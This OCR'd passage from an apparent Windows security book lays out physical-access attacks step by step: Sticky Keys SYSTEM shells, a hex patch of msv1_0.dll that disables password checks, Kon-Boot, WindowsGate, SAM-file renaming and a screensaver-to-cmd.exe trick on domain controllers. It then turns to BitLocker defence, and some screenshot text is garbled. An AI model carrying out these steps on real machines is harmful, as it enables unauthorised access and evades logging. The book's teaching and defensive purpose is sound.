Security is disabled. This leaves the system vulnerable to network attacks. 


Overview 

Domain Profile 

@ Windows Firewall is on 

© inbound connections that do not match a rule are blocked. 
@ Outbound connections that do not match a rule are allowed. 


Private Profile is Active 
Windows Firewall is off. 


Public Profile 

QU Windows Firewall is on. 

© inbound connections that do not match a rule are blocked. 
@ Outbound connections that do not match a rule are allowed. 
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By typing sysdm.cpl, and clicking on the Remote tab, you can enable remote desktop on the 
machine. Terminal services allows a user to remotely connect to another system over TCP port 
3389. The middle choice will allow remote access without pre-authentication. 


E Administrator: sethc.exe 
jsoft Windows [Uersio 
> 2006 Micr 


System Properties 
[Computer Name. | Hardware | Advanced | System Protection | Remote | 


Remote Assistance 


V] Allow Remote Assistance conne: 


Remote Desktop 


Click an option, and then specify who can connect, f needed. 


Dont allow connections to this computer 


ctions from computers running any version of 


s only from computers running Remote 
twork Level Authentication (more secure) 


Select Users 


To obtain the Internet protocol (IP) address information of the system, type ipconfig /all. 
Although the output can be quite extensive in Vista and Windows 7, look for the IPv4 address 
that is labeled "Preferred." 


IIT Administrator: sethc.exe lolx] 


ae pr eoo" CR? PRO/1888 MI Network Connection 
: 21-E9-43 


148 (Preferred) 


A voee (dU siia uie 192.1 
` : Enabled 


Once the IP address of the target has been found, connect though a machine running Linux 
on the same network by typing rdesktop —f and the IP address of the target system, for example, 
rdesktop -f 192.168.232.50. This IP address should match the “Preferred” IPv4 address dis- 
cussed just above. When connecting to the machine with remote desktop enabled, use Linux, 
Mac, or an XP machine running remote desktop. The newer versions included in Windows 7, 
2008, Vista, and updated versions of 2003 and XP require a username and password before the 
connection is made. 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


t:-# rdesktop -f 192.168.232.50ff 


—.]| t Shell | 
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Even though all user accounts are disabled on the target machine, the SYSTEM account can 
still be utilized. In order to launch a command prompt, hit Shift five times to initiate a Sticky Keys 
attack. The Utilman.exe attack can also be utilized on Vista, 2008, and Windows 7 systems that 
were altered. Oddly enough, these attacks do not show up in the security log in the event viewer. 
Type eventvwr.msc to launch the event viewer. Check Windows logs and security logs to verify 
that SYSTEM access has not been logged. 


* Windows Vista Ultimate 


How to Log In without Knowing the Password 


For some individuals, it can be extremely useful to be able to log in as the user and see what is 
located within that user's profile. While the Sticky Keys and Utliman hacks provide SYSTEM 
access, you can not log into the user's account without changing the user's password. Changing 
the user's password has two serious implications: 


1. The user will realize that their password has been changed. 
2. EFS encrypted files cannot be opened once a password change has occurred. 


Sometimes good guys (and bad guys) need to log in as a specific user to get some artifacts off the 
computer and log off. There are methods and utilities that will allow attackers to log on as any user 
on the system without providing a password. One way to achieve such access is by changing a few 
bytes of a single file with a hex editor. This attack works on Windows XP. 

The following directions show how to use the BackTrack 4 DVD to change the bytes of this file: 


1. Boot to the BackTrack 4 DVD. 

2. Log in as root with the password of toor. 

3. Type startx to bring up the GUI. 

4. Open a terminal and type the following command in Linux: fdisk 1. 
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root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


In most cases, you will see a single NTFS partition. Even though the device is listed as /dev/sdal, 
in this case it is mounted to /mnt/sdal. The mount command will verify this. 

The mount command will work fine, and the last line will give you the relevant information. 
You can eliminate the extra information by typing mount | grep fuse. 


root@bt: ~ - Shell - Konsole 


a Shell 


The file that needs to be altered is called msv1_0.dll. The file is located is the WINDOWS/ 
System32 directory. To enter that directory, type the following command: cd/mnt/sdal/ 
WINDOWS/system32. 


root@bt: /mnt/sdal/WINDOWS/system32 - Shell - Konsole T wx 
Session Edit View Bookmarks Settings Help 


—]| at Shell 


It is always best practice to back up a file before changing it. Use the following command to 
copy the current msvl, O.dll file: cp msvl. O.dll msv1_0.old. 


at Shell 


The file msv1_0.dll needs to be changed with a hex editor. There are many good hex editors 
available for Windows and Linux. BackTrack 4 includes the tool hexedit. To edit the msv1_0.dll 
file, type the command hexedit msv1 O.dll. 
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Session Edit View Bookmarks Settings Help 


| «t Shell | 


If the command was typed correctly, you will see a blue screen with a hex view of msvl_0 
.dll. If you type the file name wrong or give the incorrect path, a message will be displayed that 
says “No such file or directory”. 


root @bt: /mnt/sdal/WINDOWS/system32 - Shell - Konsole 
Session Edit View Bookmarks Settings Help 
File: SE E 


üf Shell 


The menu bar appears at the bottom of the screen. Pressing Control and W will allow the user 
to search for text strings or specific bytes within the file. Select Search for Hex bytes. 


After hitting Enter on the Search for Hex bytes menu selection, a Byte Search title bar will 
appear. Type 75 11 to search for the consecutive sequence of hex bytes 75 and 11. 


Change the hex byte values of 75 and 11 to BO 01. Press Control and X to exit and save. 


rootGbt: /mnt/sda1/WINDOWS/system32 - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


File: msvl O.dll — ASCII Offset: DSEENECER 7 OxXOOOIFOFF (328) MØ 


at Shell 
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Reboot the machine into Windows. After making this change to this file, you can log on to 
Windows with any account on the machine without a password. 


Note: You will not be able to open the user's EFS encrypted files. 


Once you have completed your tasks, you should restore the previous msv1_0.dll file. To 
restore the file, boot back to the BackTrack. Log in with the username of root and password of 
toor. Type startx to initiate the GUI. Open a terminal and navigate to the System32 directory by 
typing cd /mnt/sdal/WINDOWS/system32. Type the following command to delete the newer 
file and restore the original in one step: mv msv1_0.old msv1_0.dll. 


@bt: /mnt/sda1/WINDOWS/system32 - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


Using Kon-Boot to Get into Windows without a Password 


Another way to log on to Windows (and some Linux) systems without a password is to use a CD 
called Kon-Boot. The Kon-Boot CD works on the following versions of Windows: 2008, Vista, 7, 
XP, and 2003. Kon-Boot also works on several versions of Linux, including Gentoo, Ubuntu, and 
Debian. Best of all, Kon-Boot is freeware and can be downloaded from the following link: http:// 
www.piotrbania.com/all/kon-boot/. 

Navigate to the website for Kon-Boot, read the legal disclaimer over, and click the CD-ISO 
download link. Unzip the file after you download it (110K B) to locate the ISO file. 


[> KON-BOOT - ULTIMATE WINDOWS/LINUX HACKING UTILITY :-) - Windows Internet Explorer 


GO- G bitp:sfve.plotrbania.com/alfkon-boot} J (5) [3€] [goose [el 


kon-boot cd piotr misah o Gee E> p Bookmarks "P check - E] autoril + (5 [d konboot [E cd [di piotr Seres 
ue | @ KoW-B007 - ULTIMATE WINDOWS)LINUX HACKING u... | | a- ib Ene - Tose” 


DISCLAIME! 
Author takes no responsibility for any actions with provided 
informations or codes. The copyright for any material created 
by the author is reserved. Any duplication of codes or texts 
provided here in electronic or printed publications is not 
permitted without the author's agreement. 


THIS WORK IS FREEWARE ONLY FOR LEGAL AND PERSONAL 
USE. YOU ARE NOT ALLOWED TO USE THIS TOOL FOR 
COMMERCIAL OR ILLEGAL PURPOSES. 


Q 


kryptos logic 
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Insert a blank CD into your system. Open the ImgBurn program and choose the selection 
Write image file to disc. 


Write image file to disc 


Click the browse button to select the image file source, navigate to the location on your hard 
drive where you downloaded the Kon-Boot ISO file, and click open. Click OK. Write the ISO 
image file to the CD by clicking the Write image to CD button. 


urn iur 
File View Mode Tools Help 


Source P HP DVD Writer 640c 3504 (ATA) 
Ww D:\CD-konboot-v1.1-2in1.iso © G3 Curent Profile: CD-R 


Label: Unknown Pe 
Imp ID: Unknown Erasable: No 
File Sys: 1509660 (Bootable) Free Sectors: 359,847 


Free Space: 736,966,656 bytes 
Free Time: 79:59:72 (MM: 


F :SS:FF) 
Lu Eat IAS Supported Write Speeds: 8x, 12x, 16x, 24x, 32x, 40x 
Time: ^ 00:02:55 (MM:SS:FF) Gb @ | ATIP Information: 
Start Time of LeadIn (MID): 97m24s16F 
NUR Last Possible Start 


Time of LeadOut: 79m59s74F 


Start the target machine with Kon-Boot in the CD/DVD drive. A window should appear with 
a scrolling message that says "Kon-Boot, a Windows and Linux hacking utility." To proceed with 
the attack, hit Enter at the Kryptos Logic Security Software title screen. 


g 


kryptos logic 


security software 


utility 


After pressing Enter, a colorful Kon-Boot title screen will appear. Several messages are included 
on the screen, including a website listing and that this software is not for commercial use. 
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by Piotr Bania 
wun. kryptos logic. com 


Kon-Boot ver. 1.8 - ready! h4xBRin uH? 


Checking SMAP BIOS entries 
BIOS s to be OK. 
Booting upt - EOT 


You can log on to Windows as administrator or any user without the user’s password. 


Note: You will not be able to read the user's EFS encrypted files. However, if you get the user's 
password with a utility like fgdump.exe or pwdump.exe, and you log on as the user with the cor- 
rect password, you can open the user's EFS files. After you remove the CD and restart the system, 
users will once again be required to log on with their username and password. 


Kon-Boot also works with several flavors of Linux, including Ubuntu, Gentoo, and Debian. 
The procedure for using this utility with Linux is similar to Windows. Boot the Linux machine 
to Kon-Boot, then hit Enter at the Kryptos Logic Security Software title screen. Once the login 
screen appears, log in as kon-usr. If the prompt is a number sign (#), that means root level access 
has been obtained. The whoami command will verify that you are logged in as root. To restore it 
to its normal state, type init 6 to restart the machine or init 0 to shut it down. 


ing random numbex 
Entering runleuel 1 
Starting suslog-ng 
* Starting ethB 
Bringing up eth@ 
lhcp 
Running 
- ethB rec 
= Mounting netuxc 
starting loc 


jentoo-um.home (Linux 


vm login: kon-usr 


shoami 


Bart’s PE and WindowsGate 


A number of years ago, a very smart and talented individual named Bart Lagerweij started mak- 
ing boot CDs and floppies. His latest creation, Bart’s PE, is an incredible utility every Windows 
user should have as part of their toolbox. Bart’s PE and the WindowsGate utility can be used on 
systems running Windows XP, 2003, Vista, 2008, and 7. 


Note: You will not be able to read EFS encrypted files. 
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Bart’s website is http://nu2.nu, and there are numerous sites and forums devoted to developing 
and enhancing Bart’s PE. Bart’s PE, or preinstalled environment, can be enhanced by adding vari- 
ous plug-ins to the ISO. Please only use legal plug-ins like Mozilla Firefox; do not be tempted by 
the plethora of illegal software plug-ins available for Bart’s PE. Software piracy is a serious crime! 

In order to use Bart’s PE, you need to have a legal copy of Windows XP, and access to the i386 
installation directory. Visit http://www.nu2.nu/pebuilder/ and download the latest self-installing 
PE Builder package. 


» Download 


Latest v H 
Download| PE Builder v3.1.10a - self-installing package (3.15MB) - if you are unsure what you need to download, get this! 
Download PE Builder v3.1.10a - zip package (3. 

Post: View P ilder v3.1. rel ings on "The CD Forum" 


Download the Wingate plug-in at http://www.virtualexile.com/wg/windowsgate.cab. After 
downloading the exe file, 


A 


. Double-click the file and click Run. 
. Select your language and click OK. 
. Click Next to the Welcome Wizard. 
. Click Next to Destination Location. 


N 


A o 


5. Click Next to Select Start Menu Folder. 
6. Check the box that states “Create a Desktop Icon” and click Next. 
7. Click Install. 
8. At the completing the setup wizard page, verify that Launch PE builder is checked and click Next. 
9. Read over the PE Builder license and click “I agree” if you agree to the terms. 
10. At the search for Windows installation files, click Yes if you do not have the install CD. If 
you do have the CD, put it in the CD tray and put the CD-ROM letter in Source. 
11. Under Media output, select the Create ISO image choice. 
12. Click the Plugins tab. 


— 
Ore Builder v3.1.10a " 


Builder Source Help 


Builder 
Source: (path to Windows installation files) 


G | J 


Custom: (include files and folders from this directory) 


Output: (c:\pebullder31 10a\BartPE) 


Create 150 image: (enter Filename)| 
c:\pebuilder31 10alpebulder.iso | Cou) 
O Burn to CD/DVD AutoErase R Eject after burn 


starB 


) using: 
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13. Click Add, browse to the location where you downloaded windowsgate.cab, select the file, 
and click the Open button. 
14. Click OK to the Name plugin folder. 


15. Click Close to close the Plugin menu. 

16. Verify Create ISO image has been selected, and click Build. 

17. Click Yes to the warning “Directory Does Not Exist, Create It?" 

18. Read over the EULA (end user license agreement) and click ^I agree" if you agree. 

19. Wait for the CD to finish compiling (it can take a while). 

20. Open Imgburn and select Write image file to disck. Select the source image, likely 
C:\pebuilder3110a\pebuilder.iso. Put in a blank CD and click Write! 


Put Bart’s CD in the target system. Click No to the option “Start network support now.” Click on 
the Go menu and find Windows Gate from the Programs menu. Highlight C:\, and place a check 
mark in the Msv1_0.dll patch box. A message box will pop up and state “Logon password valida- 
tion is OFF.” Click on the Go menu, select Shutdown from the menu, and click Restart. Take the 
CD out, and log on without any password. 


re WindowsGate 


WindowsGate ;. 


for Windows 2000/XP/2003/Vista/2008 (2/64-bi 


(C) Copyright 2008 by D: 
AUR 


Use with Windows Live CDs ights Reserved 


J0.2180 (xpsp. sp2 rtm.040803-2158)] 
WindowsGate 


Logon password validation is OFF 


License: HOME USAGE ONLY 


Disclaime 


To turn logon password validation back on, put Bart’s CD back in the target system. Click No 
to “Start network support now.” Click on the Go menu and find Windows Gate from the Programs 
menu. Highlight C: and remove the check from the Msv1_0.dll patch box. A message box will 
pop up and state “Logon password validation is ON.” Click on the Go menu, select Shutdown 
from the menu, and click Restart. All users will now be required to log on with a password. 
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i zlwindowsGate 
WindowsGate :. 
for Windows 2000/XP/2003/Vista/2008 (32/64-bit) 


(C) Copyright 2008 by Damian 
Use with Windows Live CDs All Rights Reserved 


eiowsGate ET 


Logon password validation is ON 


=a 


[ Msvi O.dl patch (check to disable logon password validation) 
[ Utilman.exe (WinKey+U) replacement 


License: HOME USAGE ONLY 


Disclaimer 


This software ) jed as-is. Absolutely no warranty c s "xpres r implied 
The author c am i$ not responsible fo: ss or an er ty damac 
software may do tc > 


Old School 


Getting in without the password did not present a great deal of challenge on a computer running 
the Windows NT, Windows 2000 Professional, or 2000 Server family. In order to break in, you 
can use any Windows or Linux Live CD distribution that will allow you to read and write to 
NTES partitions. For this example, we will use Bart’s PE. 

Boot your system with your Bart’s PE Live CD. Click No to “Start network support now.” 
Click on the Go menu and find the A43 File Management Utility from the Programs menu. Click 
on the C: drive, which is usually the location. The installation directory is likely WINNT or 
Windows. After you find that directory, find the System32 directory. Look for the config directory 
and find the file called SAM. Right click on the file and rename it to SAM.old. 


C WINDOWS \system32\ config d 


RASS 


SECURITY 


=) SECURITY.LOG [E] system.sav 
software TempKey.LOG 
= software.LOG B userdiff 
software.sav userdiff. LOG 
SysEventEvt 
|[Nomai v]|I^ Overwite [~ Zip Password [^ Relative Path [~ Hidden/System 
[20 object(s) (15,973,376 bytes) [ 1 object(s) selected (262,144 bytes) [C: 2.90GB free (4.99GB total) 


Click on the Go menu, select Shutdown from the menu and click Restart. Take the Bart's PE 
CD out of the system. A new SAM file will be created upon reboot. You can log on to the system 
with the username of administrator with a blank password. To restore the original users and pass- 
words, boot back up to Bart's PE and open the A43 File Management Utility from the Programs 
menu. Find the new SAM file, right click on it and select delete. Rename the SAM.old file back 
to SAM. After a reboot, all user accounts with their corresponding passwords will be restored. 
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2000 Server Family Domain Controllers 


Boot your system with your Bart’s PE Live CD. Click No to “Start network support now." Click 
on the Go menu and find the A43 File Management Utility from the Programs Menu. Click 
on the C: drive, which is usually the location. The installation directory is likely WINNT or 
Windows. After you find that directory, find the System32 directory. Look for the config directory 
and find the file called SAM. Right click on the file and rename it to SAM.old. 

Renaming the SAM file will only reset the local administrator password. It will not affect 
the active directory accounts, which are stored in the NTDS.dit file. Click on the Go menu, 
select Shutdown from the menu and click Restart. Take out the Bart's PE CD and hit F8 while 
the domain controller is booting to display the advanced menu options. Select the menu choice 
Directory Services Restore Mode (Windows 2000 domain controllers only). 


Select the server operating system and click Enter. Log on to the system with the user name of 
administrator and a blank password. Click OK to the diagnostics message that Windows is run- 
ning in safe mode. Click on Start, go up to Run, and type regedit. Find the HKEY USERS regis- 
try key (fourth from the top). Expand .DEFAULT, then Control Panel, then Desktop. Double click 
on the SCRNSAVE.EXE to edit the string. In the value data field, type cmd.exe and click OK. 


2 I 
£, Registry Editor WEE: 
Registry Edit View Favorites Help 


E-S My Computer 2| | Name Type Data p 
m- HKEY_CLASSES_ROOT 
H- HKEY_CURRENT_USER 
H- HKEY_LOCAL_MACHINE 
EC HKEY UsERS 

E (Cg DEFAULT 
LJ AppEvents 


&X)ForegroundFlashCount REG DWORD 000000003 (3) 

E2] ForegroundLockTimeout REG DWORD 0x00030d40 (200000) 
[ab] GridGranularity REG_SZ 0 

ab] HungAppTimeout REG, SZ 5000 


El corel 
EC Control Panel 
Eg Accessibility Value name: 
EH Appearance [SCRNSAVE.EXE 
(C3 Colors 
(CJ current Value data: 
Œ Custom Colors [cmd exe 
E Desktop 
(C3 WindowMetri 
CJ dont load 


E Input Method wj |[ab]scRNSAVE.EXE REG SZ logon.scr >| 
> 4 > 


[My Computer\HKEY_USERS\.DEFAULT\Control Panel\Desktop Al 
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The default value for the screen saver to come on is 900 seconds, which is 15 minutes. This 
value is set in the string field ScreenSaveTimeOut. To change the value of this string, double click 
on it. It can be changed to 60 seconds or 10 seconds. 


Edit String REG 


Value name: 


[ScreenSaveTimeDut 


Value data: 


E € 
NI 


ScreenSaveTimeOut 


Restart the machine. Shortly after the Windows 2000 server logon screen appears (approxi- 
mately 10 seconds), a command prompt will launch instead of the screen saver. Type net user 
administrator Pa$$wOrd to change the administrator password. You should receive the message 
that the command completed successfully. Type exit to log out of the command window session. 
You can now log on to the domain controller with the username of administrator and the pass- 
word of Pa$$wOrd. 


66 (Version 5.88.2195] 
AAA Microsoft Corp. 


C:\WINNT\syste 1 user administrator Pa$SuUrd 
The command successfully. 


C: NUINNT*Ss ysten32 


Defending against Physical Attacks on Windows Machines 


By enabling BitLocker, the Windows system partition will be encrypted. This will prevent attack- 
ers from viewing data and manipulating Windows system files when they boot to a Live CD. 
Although the use of BitLocker as a security measure will be extremely effective at protecting 
your computer from physical attacks, it is only available on Server 2008 and the Ultimate and 
Enterprise versions of Windows 7 and Vista. If you do decide to implement BitLocker, consider 
the following suggestions: 


1. It is a good idea to back up your data before you encrypt your system volume. 
2. Keep your recovery keys in a safe, but hidden place. When things go wrong, the recovery 
keys will become essential in getting your data back. 
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3. Consider using the digital locker. For a fee, your recovery keys can be stored in a digital 
locker. 

4, If you are using Ultimate or Enterprise in a domain environment, consider storing the keys 
in Active Directory. In my experience, this works best with 2008 domain controllers. 


Partitioning Your Drive for BitLocker 


In order to use BitLocker, more than one partition is required. One of the partitions will contain 
unencrypted information that will allow the system to boot. This partition tends to be rather small 
(less than 2 GB), and is partitioned with the NTFS file system. In most cases, nothing of any 
value is stored in the unencrypted volume. It is not recommended to use BitLocker on a dual boot 
system with multiple partitions. One of the reasons for this is the fact that the BitLocker volume 
will be unreadable to the other operating systems. 


Windows 7 


When a user completes a fresh install of the Windows 7, the system is partitioned properly for 
BitLocker. However, only the Ultimate and Enterprise editions with the BitLocker feature will 
have a BitLocker drive encryption selection in the System and Security area of the Control Panel. 
‘The good news about Windows 7 is that no special additional tools need to be used to reparation 
the drive for BitLocker. 


BitLocker Drive Encryption 
Protect your computer by encrypting data on your disk | Manage BitLocker 


And, unlike Vista, with Windows 7, the sub-selection *Protect your computer by encrypt- 
ing data on your disk" is automatically available. However, BitLocker can not be used on the 
system volume until the trusted platform module (TPM) is initialized or Windows group policy 
is changed to allow the use of BitLocker without a TPM. After these configurations are made, 
BitLocker can be enabled on the system volume. 


Windows Vista 


While no additional tool is needed to configure BitLocker in Windows 7, additional tools are needed 
for Windows Vista. Unless the user previously configured the partition manually, users will get an 
error if they try to enable BitLocker in Vista on a system with a single partition. 


The drive configuration is unsuitable for BitLocker Drive Encryption. To use BitLocker, please 


UN re-partition ycur hard drive according to the BitLocker requirements. 
ra 


Set up your hard disk for BitLocker Drive Encryption 


To deal with this issue, Microsoft has created the BitLocker Drive Preparation Tool. This free 
tool is only for users with the Ultimate edition of Vista, and can be downloaded at the following 
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link: http://www.microsoft.com/downloads/details.aspx?FamilyID=320b9aa9-47e8-44f9-b8d0- 
4d7d6a75add0&displaylang=en. Download the x86 file if you have a 32-bit operating system 
or the x64 file if you have a 64-bit operating system. The following steps are needed to utilize 
BitLocker on a Windows 7 system without a TPM: 


. Double click on the downloaded BitLocker Drive Preparation Tool (.msu file). 

. Click Continue if prompted by User Account Control. 

Click OK to install the software update. 

Read over the license agreement and click “I accept” if you accept the terms. 

. Click Close at the Installation Complete screen. 

. Click on the Pear (Start), go to All Programs, Accessories, System Tools, BitLocker Drive 
Preparation Tool. 
7. Click Allow if prompted by User Account Control. 
8. Read over the Microsoft Software License Terms, and click “I accept” if you agree. 
9. Read the warnings and information about the S: drive that will be created. 

10. Click Finish after receiving the message "BitLocker drive preparation is complete." 


©) (ge BitLocker Drive Encryption 
Preparing Drive for BitLocker 
New active drive S: will be created from free space on drive C: 


The boot files will be moved to the new active drive. The new active drive 
cannot be protected by BitLocker. 


Caution: 
Æ Back up critical data and files before continuing. 


This process may require defragmentation, which may require 
Á from a few minutes to a few hours depending on the 
condition of your drive. 


Â Do not store important data and files on the new active drive. 


After the user installs and runs the BitLocker Drive Preparation Tool on their machine running 
the Vista Ultimate operating system, the system will have two partitions. The small primary parti- 
tion (less than 2 GB) with unencrypted boot information and the system drive. In order to enable 
BitLocker on the system partition, either the TPM needs to be initialized or group policy settings 
need to be changed to allow BitLocker without a TPM. 


Trusted Platform Modules 


The default setting in Windows Vista and 7 is to use BitLocker with a TPM. A TPM is a hardware 
device that stores encryption keys. The TPM “ties” the hardware to an individual computer. If 
significant hardware changes are made to the computer, Windows will not start up. If a new video 
card needs to be installed, the user should disable BitLocker in the Control Panel, then re-enable it 
after the hardware changes are made. A computer with BitLocker and a TPM is safest from attack 
when it is shutdown completely. 
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Using BitLocker with a TPM 


BitLocker requires a TPM version 1.2 or higher. To use BitLocker with a TPM, you must initial- 
ize the TPM. A simple check of the computer’s BIOS will usually indicate if the computer has a 
TPM. If your system does have a TPM, and it is in the system BIOS, you may need to enable it. 
BIOS configurations will vary for different manufacturers, but most TPMs are configured in the 
“security area.” Once the TPM has been enabled in the BIOS, the user should have the ability to 
initialize it from the Windows Taskbar. 


8:05 PM 


Although a TPM screen can vary, most of the configuration screens will appear similar to the 
Infineon Security Platform Settings Tool. On many of these configuration screens, there will be 
an area that is designated specifically for BitLocker. 


Ex Administrator: Infineon 


{info || User Settings | Backup | Migration | Password Reset |BitLocker | Advanced | 


... infineon aay 


Welcome to the Infineon Security Platform Solution 


When the BitLocker tab is selected, the tool will ask the user if they want to start the TPM 
initialization wizard. Click Yes to initialize the TPM. 
After the TPM has been initialized and the system has been properly partitioned, the user will 


ad The Security Platform state is "Not initialized". Do you want to start the 
WL Infineon Security Platform Initialization Wizard? 


receive no further errors when they enable BitLocker in the Control Panel. 'The time it takes for 
the volume to be encrypted will vary depending on the hard disk size. BitLocker will indicate what 
percentage of the volume has been encrypted. Surprisingly, you should notice little difference in 
the performance of the system after the entire drive is encrypted. 


Using BitLocker without a TPM 


The default setting for Windows Vista, 2008, and 7 is to use BitLocker with a TPM. In order to 
enable BitLocker volume encryption without a TPM, default group policy settings will have to be 
changed. After these settings are changed, BitLocker can be enabled in the Control Panel. A USB 
key will be required during setup and during boot to use BitLocker without a TPM. 
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Windows 7 


Trying to use BitLocker volume encryption on Windows 7 without a TPM will result in an error. 
When attempting to configure a system for BitLocker without a TPM, you will get the message 
"A compatible TPM Security Device must be present on this computer...". This is not exactly a 


true statement; a quick change to one group policy setting will allow you to utilize BitLocker 
without a TPM. 


Q3 A compatible Trusted Platform Module (TPM) Security Device must be present on this computer, but a 


TPM was not found. Please contact your system administrator to enable BitLocker. 


The following steps are needed on a computer running the Windows 7 operating system to 
enable BitLocker without a TPM: 


1. Click on the Pearl (Start), go up to run and type the command gpedit.msc. 

2. Double click on Computer Configuration. 

3. Expand the Administrative Templates folder (third from the bottom). 

4. Expand the Windows Components folder. 

5. Expand the BitLocker Drive folder. 

6. Select Operating System Drives. 

7. Double click on the first setting in the list entitled "Require additional authentication at 
startup." 

8. Click the Enabled radio button. 

9. Check the box that states "Allow BitLocker without a compatible TPM." 


FE] Require additional authentication at startup Previous Setting Next Setting 


© Not Configured Comment: A 


© Disabled 
Supported on: Windows 7 family 


Options: Help: 


If you want to use BitLocker on a computer without a ^ 
TPM, select the "Allow BitLocker without a compatible 
TPM" check box. In this mode a USB drive is required 
for start-up and the key information used to encrypt the 
drive is stored on the USB drive, creating a USB key. 
When the USB key is inserted the access to the drive is | 


[V] Allow BitLocker without a compatible TPN ^ 
(requires a startup key on a USB flash drive) 
Settings for computers with a TPM: 


Configure TPM startup: [E | | authenticated and the drive is accessible. If the USB key | | 
is lost or unavailable you will need to use one of the 
Allow JEM = BitLocker recovery options to access the drive. E 
figure TPM startup PIN: | 
Configure P On a computer with a compatible TPM, four types of | 
Allow startup PIN with TPM - authentication methods can be used at startup to 
provide added protection for encrypted data. When the 
Configure TPM startup key: computer starts, it can use only the TPM for 
= authentication, or it can also require insertion of a USB 
[Allow startup key with TPM =] flash drive containing a startup key, the entry of a 4- 


digit to 20-digit personal identification number (PIN), or 


Lo) [cone] [arer 


10. After the group policy setting has been changed, go to the Control Panel, System and 
Security, and select Turn On BitLocker. 
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pemmcmx 


Gym « Systeman.. v BitLocker Drive Encrypton ~ [ep] scor Conrat Por | 
@ 
Help protect your files and folders by encrypting your drives 


BitLocker Drive Encryption helps prevent unauthorized access to any files stored 
on the drives shown below. You are able to use the computer normally, but 
unauthorized users cannot read or use your files. 


What should I know about BitLocker Drive Encryption before I turn it on? 


Control Panel Home 


BitLocker Drive Encryption - Hard Disk Drives 


: 
See also [a Off 


(® TPM Administration 

["] Disk Management 
Read our privacy statement 
online 


BitLocker Drive Encryption - BitLocker To Go 
Insert a removable drive to use BitLocker To Go. 


11. Click Next at the BitLocker Drive Encryption setup screen. 


BitLocker Drive Encryption setup 


The following preparations will be made on this computer to enable BitLocker. 


Prepare your drive for BitLocker 
Encrypt the drive 


(Nee) [canca] 


12. Carefully review the two warning messages at the bottom of the screen. Back up your critical 
data before your proceed and click Next when you are ready to continue. 


Caution: 


Â We recommend that you back up critical files and data before continuing. 
Use Backup and Restore Center to perform a backup 


Â This process might take awhile, depending on the size and fragmentation condition of the 
drive. 


13. If your system currently only has a single partition, you will receive messages that Windows 
is “Shrinking drive C:,” “Creating new system drive,” and “Preparing drive for BitLocker.” 
Click Restart Now when drive preparation has been complete. 
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a 


©) Be BitLocker Drive Encryption (C) 


Preparing your drive for BitLocker 
Do not turn off or restart your computer until this process has been completed, 
Shrinking drive C: 


Creating new system drive 
Preparing drive for BitLocker 


o — gm 3j 


IR 7 


14. After restarting the system, your screen should have a green check next to "Prepare your 
drive for BitLocker.” Click Next to encrypt the drive. 

15. Stick your USB stick in the drive. At the Set BitLocker startup preferences screen, select 
"Require a Startup key at every startup." 


m—————————— I E NNNEY = 


Qj e BitLocker Drive Encryption (C) 


Set BitLocker startup preferences 


This computer does not appear to have a TPM, To use BitLocker Drive Encryption, a startup key on a USB 
flash drive will be required every time you start the computer. 


Ð Use BitLocker without additional keys 
> Require a PIN at every startup 


*» Require a Startup key at every startup 


@ Some settings are managed by your system administrator. 
What iz a BitLocker Drive Encryption startup key or PIN? 


16. At the save your startup key window, verify that your USB device has been recognized and 
click Save. When you turn on the computer, the USB device must be present or the system 
will not boot. 

17. There are three options for saving the all important recovery key: 

— Save the recovery key to a USB flash drive. 
— Save the recovery key to a file. 
— Print the recovery key. 

18. Anyone who has possession of the recovery key can unencrypt the data. It would be wise to 
print the recovery key as well as save it to the USB drive. Select the Save the recovery key to 
a USB flash drive and Print the recovery key options to do so. 
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> Save the recovery key to a USB flash drive 
> Save the recovery key to a file 


* Print the recovery key 


19. The final screen in the setup wizard is titled “Are you ready to encrypt this drive?" By default, 
your system will run a BitLocker system check to determine if your keys are working before 
the volume is fully encrypted. If the system reboots and is able to read the keys, encryption will 
start once the operating system loads. 

A status bar will indicate the progress of the encryption. After the process is finished, the 
system will inform you that the encryption of C: is complete. 


m Encrypting... 


Drive C: 20.9% Completed 


-—— — j 


Close 


20. After the encryption has completed, the Disk Management Utility can be utilized to view 
the current configuration. To view the disk configuration in Disk Management, right click 
on Computer from the Start menu and select Manage. Select the Storage folder and double 
click on Disk Management. In Windows 7, your disk should be configured with a small 
(100 MB) reserved partition as well as have a volume that is BitLocker encrypted. 


Á 15.71 GB NTFS (BitLocker Encrypted) 300 MB NTFS 
Online Healthy (Boot, Page File, Crash Dump, Primary Partitior | Healthy (System, Active, Primar 


Vista and 2008 


The default setting of Vista and 2008 systems is to use BitLocker in conjunction with a TPM. 
If your system lacks TPM hardware and you click on the BitLocker icon in the Control Panel a 
“TPM was not found” error message will be displayed. 


À A TPM was nct found. A TPM is required to turn on BitLocker. If your computer has a TPM, then 
a contact the computer manufacturer for BitLocker-compatible BIOS. 


The following steps are needed on a computer running the Vista or 2008 operating system to 
enable BitLocker without a TPM: 


1. Click on the Pearl (Start), go up to run and type the command gpedit.msc. 
2. Click Continue if prompted by User Account Control. 

3. Double click on Computer Configuration. 

4. Expand the Administrative Templates folder (third from the bottom). 
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5. Expand the Windows Components folder. 

6. Expand the BitLocker Drive Encryption folder. 

7. Double click on the fourth setting in the list, entitled 

“Control Panel Setup: Enable advanced startup options.” 

8. Click the Enabled radio button. 

9. Go into the Control Panel and click the BitLocker Drive Encryption icon. 
10. The option to turn on BitLocker should become available. 
11. Click Turn On BitLocker, and follow the wizard through the setup process. 


es) (= es) 
gO- C « BitLocker Drive Encryption + | +s] | Search p 
e- 
BitLocker Drive Encryption encrypts and protects your data. 
BitLocker Drive Encryption helps prevent unauthorized access to any files stored 


on the volume shown below. You are able to use the computer normally, but 
unauthorized users cannot read or use your files. 


What should I know about BitLocker Drive Encryption before I turn it on? a 


Volumes 


ky Z CA $ of E 


<Tum On BitLocker > S 


BitLocker Hacks 


Once BitLocker has been implemented on a system, there is little likelihood that a hacker will have 
any chance of getting into the system without the recovery key. However, researchers at Princeton 
University have been able to find a workaround when certain conditions are present. The research- 
ers were not able to break into the operating system when a system with BitLocker volume encryp- 
tion was completely shut down. However, the group from Princeton was able to unlock the drive 
by getting the keys out of RAM when the system was in a locked, password-protected state. 

By cooling the RAM with a common dust spray can, the Princeton researchers were able to slow 
down the rate at which memory faded. They then booted the system up to MSramdmp, a utility that 
has a small boot partition and a Venix 80286 partition. MSramdmp, which was developed by Wesley 
